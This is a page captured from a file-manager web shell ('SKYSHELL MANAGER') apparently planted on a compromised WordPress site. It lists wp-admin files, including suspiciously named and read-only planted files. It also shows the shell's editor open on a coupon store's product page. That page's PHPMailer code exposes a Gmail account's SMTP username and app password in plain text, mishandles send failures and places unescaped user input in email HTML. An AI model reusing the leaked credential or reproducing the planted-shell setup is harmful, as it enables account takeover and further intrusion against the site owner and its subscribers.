📁
SKYSHELL MANAGER
PHP v8.1.29
Create
Create
Path:
root
/
var
/
www
/
html
/
wxwpsite
/
fungiftdeals
/
wp-admin
/
Name
Size
Perm
Actions
📁
css
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
includes
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
maint
-
0755
🗑️
🏷️
🔒
📁
network
-
0755
🗑️
🏷️
🔒
📁
user
-
0755
🗑️
🏷️
🔒
📄
about.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-footer.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-functions.php
0.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin.php
12.63 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
async-upload.php
5.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
authorize-application.php
10.09 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
comment.php
11.37 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
custom-header.php
0.49 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
customize.php
11.21 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit-form-blocks.php
14.73 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit.php
19.48 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
export-personal-data.php
7.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
font-library.php
1.01 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
home.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php
7.68 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
media-upload.php
3.58 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
menu-header.php
9.82 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
network.php
5.39 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
press-this.php
2.41 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
privacy.php
2.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
setup-config.php
17.52 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
themes.phpwp-update.php
114.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
tools.php
3.43 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
update.php
12.76 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
user-edit.php
40.35 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
widgets-form-blocks.php
5.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-mail.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: finish.php
<!DOCTYPE html> <html> <head> <link rel="shortcut icon" href="images/fav.png" /> <title>Finish Powerball - Triumph Coupons</title> <link href="css/bootstrap.css" rel="stylesheet" type="text/css" media="all" /> <!-- jQuery (necessary for Bootstrap's JavaScript plugins) --> <script src="js/jquery.min.js"></script> <!-- Custom Theme files --> <!--theme-style--> <link href="css/style.css" rel="stylesheet" type="text/css" media="all" /> <!--//theme-style--> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="keywords" content="Retail coupon deals, coupns, coupon deals,Retail things" /> <script type="application/x-javascript"> addEventListener("load", function() { setTimeout(hideURLbar, 0); }, false); function hideURLbar(){ window.scrollTo(0,1); } </script> <!--fonts--> <link href='http://fonts.googleapis.com/css?family=Lato:100,300,400,700,900' rel='stylesheet' type='text/css'> <link href='http://fonts.googleapis.com/css?family=Vollkorn:400,700' rel='stylesheet' type='text/css'> <!--//fonts--> <script type="text/javascript" src="js/move-top.js"></script> <script type="text/javascript" src="js/easing.js"></script> <script type="text/javascript"> jQuery(document).ready(function($) { $(".scroll").click(function(event){ event.preventDefault(); $('html,body').animate({scrollTop:$(this.hash).offset().top},1000); }); }); </script> </head> <body> <!--header--> <div class="header"> <div class="container"> <!----> <div class="logo"> <a href="index.html"><img src="images/log1.png" alt="" style="width:75%;margin-top:-4%"></a> </div> <div class="header-right"> <div class="header-bottom"> <div class="top-nav"> <span class="menu"> </span> <ul> <li><a href="index.php">HOME</a> </li> <li><a href="about.php" > ABOUT US</a></li> <li class="active"><a href="product.php" > PRODUCTS</a></li> <li><a href="contact.php" > CONTACT US </a></li> <li><a href="subscribe.php">SUBSCRIBE </a></li> </ul> <!--script--> <script> $("span.menu").click(function(){ $(".top-nav ul").slideToggle(500, function(){ }); }); </script> </div> <a href="#" class="cart">(+1) 718392325</a> <div class="clearfix"> </div> </div> </div> <div class="clearfix"> </div> </div> </div> <!----> <!----> <div class="content"> <div class="container"> <!--- <div class="content-nestle" style="margin-top:3%;height:400px;"> <div> <h2 style="text-align:center;padding-top:15%;color:#FF1573;font-size:45px; text-shadow: 2px 2px yellow;">Products</h2> </div> <div class="clearfix"> </div> </div> <!----> <div class="content-bottom" style="margin-top:5%"> <nav class="breadcrumbs-container" aria-label="Breadcrumbs"> <a href="index.php"><b>Home</b></a> <span class="breadcrumbs-delimiter" aria-hidden="true"> <svg aria-hidden="true" focusable="false" role="presentation" xmlns="http://www.w3.org/2000/svg" width="8" height="5" viewBox="0 0 8 5"> <path fill="currentColor" fill-rule="evenodd" d="M1.002.27L.29.982l3.712 3.712L7.714.982 7.002.27l-3 3z"></path> </svg> </span> <a href="house-hold.php" title=""><b>House Hold Supplies</b></a> <span class="breadcrumbs-delimiter" aria-hidden="true"> <svg aria-hidden="true" focusable="false" role="presentation" xmlns="http://www.w3.org/2000/svg" width="8" height="5" viewBox="0 0 8 5"> <path fill="currentColor" fill-rule="evenodd" d="M1.002.27L.29.982l3.712 3.712L7.714.982 7.002.27l-3 3z"></path> </svg> </span> <span>Finish Powerball </span> </nav><br> <div class="prod-det"> <div class="prod-left" style="width:45%"> <img src="images/house-hold/finish.jpg" title="" alt""/ style="width:80%"> </div> <div class="prod-right"> <h3>Finish Powerball All in 1 Max Shine & Protect Lemon Sparkle 413g = 22s </h3><br> <h3>$7.40036 USD </h3> <div class="product-description rte" data-product-description=""> <p><strong>Buy Finish Powerball All in 1 Max Shine & Protect Lemon Sparkle 413g = 22s</strong></p> <ul style="line-height:35px;"> <li>Removes baked-on food</li> <li>13 wrapper free tabs</li> <li>No need to unwrap</li> </ul> <p>Tips for saving water, energy, CO2 and money Scrape instead of pre-rinsing Fill the machine to capacity Try the 50° or lower temperature programs</p> <p><strong>Product Marketing</strong> When washing up with a dishwasher, Finish dishwashing tablets deliver powerful dish and glass cleaning in the toughest conditions. The dishwasher tablets are suitable to be used in most dish washing tasks that involve a dish washer. When washing up with a dishwasher for clean dishes and glasses you can enhance dishwashing by using Finish Dishwasher tablets in conjunction with Finish Dishwasher Rinse Aid and Finish Dishwasher Cleaner. Tackles whatever you throw at it. Our powerball boosts the tablet to remove even baked-on food, giving you a powerful clean 1st time everytime. #1* Recommended *Finish is the most recommended detergent, based on the market share of the dishwasher manufacturers that recommend Finish</p> <p><strong>Brand Marketing</strong> Recommended by renowned dishwasher manufacturers Beko, Bosch, Neff, Samsung, Siemens</p> <p><strong>Ingredients</strong> 5-15% Oxygen-Based Bleaching Agents, Phosphonates, <5% Polycarboxylates, Non-Ionic Surfactants, Enzymes (Subtilisin, Amylase), Perfumes</p> <p><strong>Additional Information</strong> Made in Poland/Europe Packaging to be recycled only if emptied completely! Pack Type: Re-Closable Packaging</p> <p><strong>Preparation and Usage</strong> Usage: Handle with dry hands only! For best results place one tablet in the dry dispenser. Do not unwrap the tablet. If tablet does not fit, consult the dishwasher manufacturer or manual for advice. For best results in short cycles, place Finish All-in-1 tablet on the floor of your dishwasher next to the filter. Always reseal bag after use. The built-in salt function is effective in soft/med & hard water up to 26°e (21°dH). If your water is very hard, use Finish Salt. For best results use 50 / 55 °C or auto programs. Suitable for septic tanks. This product does not protect from mechanical damage or restore already damaged items. Finish Rinse Aid is recommended for best drying results.</p> <p><strong>Storage</strong> Store away from heat and moisture.</p> <p><strong>Safety</strong> WARNING FINISH ALL in 1 Max Regular. Causes serious eye irritation. Keep out of reach of children. IF IN EYES: Rinse cautiously with water for several minutes. Remove contact lenses, if present and easy to do. Continue rinsing. If eye irritation persists: Get medical advice/attention. If medical advice is needed, have product container or label at hand. Do not ingest. If product is ingested then seek medical advice. Close the bag properly. HANDLE AND STORE SAFELY</p> <p><strong>Product Disclaimer</strong> <br>At <b>triumphcoupons.com</b>, we work to ensure that product information on our website is correct, manufacturers may alter their product information, packaging, ingredients, nutritional guides and allergy advice so you may occasionally see a change or difference in products. Please be aware that triumphcoupons.com are not the manufacturer of the products sold on our website. Actual product packaging and materials may contain more or other different information than shown on our website. If you have any specific product queries, please contact the manufacturer. We recommend that you always read the label carefully before using or consuming any products including medicinal products. Please do not solely rely on the information provided on our <b>triumphcoupons.com</b> website and therefore we are unable to accept liability for any inaccuracies or incorrect information contained or presented on our website.</p> </div> </div> <div class="clearfix"> </div> </div> </div> <!----> <div class="grid-top-in" style="margin-top:120px;padding-top:120px;"> <div class="grid-top"> <div class="col-md-4 top-grid "> <h5>ABOUT RETAIL COUPON DEALS.</h5> <p class="sed">"Triumph Coupons" has become the leading online Retail store offering the widest variety of consumer products. Find everything from Retail, household cleaning products, health and beauty supplies, baby products, pet food and much more. Now the speed of online shopping, the convenience of fast delivery and the value of discount mercury can be yours from the comfort of your own home!.</p> </div> <div class="col-md-4 top-grid"> <h5>INFORMATION</h5> <ul class="social-in"> <li><a href="privacy.php">Privacy Policy</a></li> <li><a href="terms.php">Terms and Confditions</a></li> <li><a href="subscribe.php">Subscribe</a></li> <li><a href="unsubscribe.php">Unsubscribe</a></li> </ul> <div class="clearfix"> </div> </div> <div class="col-md-4 top-grid"> <h5>NEWSLETTER:</h5> <p class="nospace btmspace-15" style="margin-bottom:15px;">Subscribe our Newsletter to get latest coupon deals and offers in your inbox.</p> <form method="post" action="#"> <fieldset> <input class="btmspace-15" type="text" name="name" value="" placeholder="Name" style="margin-bottom:15px;"><br> <input class="btmspace-15" type="text" name="email" value="" placeholder="Email" style="margin-bottom:15px;"><br> <div class="send"> <input type="submit" name="Submit" value="Submit" > </div> </fieldset> </form> <?php use PHPMailer\PHPMailer\PHPMailer; use PHPMailer\PHPMailer\SMTP; use PHPMailer\PHPMailer\Exception; //require_once __DIR__ . '/vendor/phpmailer/src/Exception.php'; require_once __DIR__ . '/vendor/phpmailer/src/PHPMailer.php'; require_once __DIR__ . '/vendor/phpmailer/src/SMTP.php'; //subscribe form if (isset($_POST['Submit'])){ $name=$_REQUEST['name']; $email=$_REQUEST['email']; $message=$_REQUEST['message']; if (($email=="")||($email=="")) { echo "All fields are required, please fill the form again."; } else{ $mail = new PHPMailer(true); // Server settings //$mail->SMTPDebug = SMTP::DEBUG_SERVER; // for detailed debug output $mail->isSMTP(); $mail->Host = 'smtp.gmail.com'; $mail->SMTPAuth = true; $mail->SMTPSecure = PHPMailer::ENCRYPTION_STARTTLS; $mail->Port = 587; $mail->Username = 'contact@triumphcoupons.com'; // YOUR gmail email $mail->Password = 'ppupwzgdzspokdmu'; // YOUR gmail password // Sender and recipient settings $mail->setFrom('contact@triumphcoupons.com', 'Triumph Coupons'); $mail->addAddress($email, $name, $message); $mail->addReplyTo('contact@triumphcoupons.com', 'Triumph Coupons'); // to set the reply to // Setting the email content $mail->IsHTML(true); $mail->Subject = "Subscribe Replay"; $mail->Body = "<h3>Hi,</h3> <p>Thanks for subscribing to our newsletter.</p> <p>We are glad that you joined us...</p><br><br> <p>Regards,<br> <b>Triumph Coupons</b></p>"; //$mail->AltBody = "This is the plain text version of the email content"; if(!$mail->send()) { echo "Success! check sometimes later."; } else { echo "Your submission has been submitted successfully."; } $mail2 = new PHPMailer(true); // Server settings //$mail2->SMTPDebug = SMTP::DEBUG_SERVER; // for detailed debug output $mail2->isSMTP(); $mail2->Host = 'smtp.gmail.com'; $mail2->SMTPAuth = true; $mail2->SMTPSecure = PHPMailer::ENCRYPTION_STARTTLS; $mail2->Port = 587; $mail2->Username = 'contact@triumphcoupons.com'; // YOUR gmail email $mail2->Password = 'ppupwzgdzspokdmu'; // YOUR gmail password // Sender and recipient settings $mail2->setFrom('contact@triumphcoupons.com', 'Triumph Coupons'); $mail2->addAddress('contact@triumphcoupons.com', 'Triumph Coupons'); //$mail->addReplyTo('contact@triumphcoupons.com', 'Triumph Coupons'); // to set the reply to // Setting the email content $mail2->IsHTML(true); $mail2->Subject = "Subscribe Details"; $mail2->Body = "<strong>Following user has been submitted subscribe details on your website <strong><br> Name : $name<br> Email : $email<br> Message : $message<br>"; //$mail->AltBody = "This is the plain text version of the email content"; $mail2->send(); } } ?> </div> <div class="clearfix"> </div> </div> </div> </div> </div> <div class="clearfix"> </div> </div> </div> </div> </div> <!----> <div class="footer"> <div class="container"> <p class="footer-grid">Copyright © 2025. All Rights Reserved.</p> </div> <script type="text/javascript"> $(document).ready(function() { /* var defaults = { containerID: 'toTop', // fading element id containerHoverID: 'toTopHover', // fading element hover id scrollSpeed: 1200, easingType: 'linear' }; */ $().UItoTop({ easingType: 'easeOutQuart' }); }); </script> <a href="#" id="toTop" style="display: block;"> <span id="toTopHover" style="opacity: 1;"> </span></a> </div> </body> </html>>
Save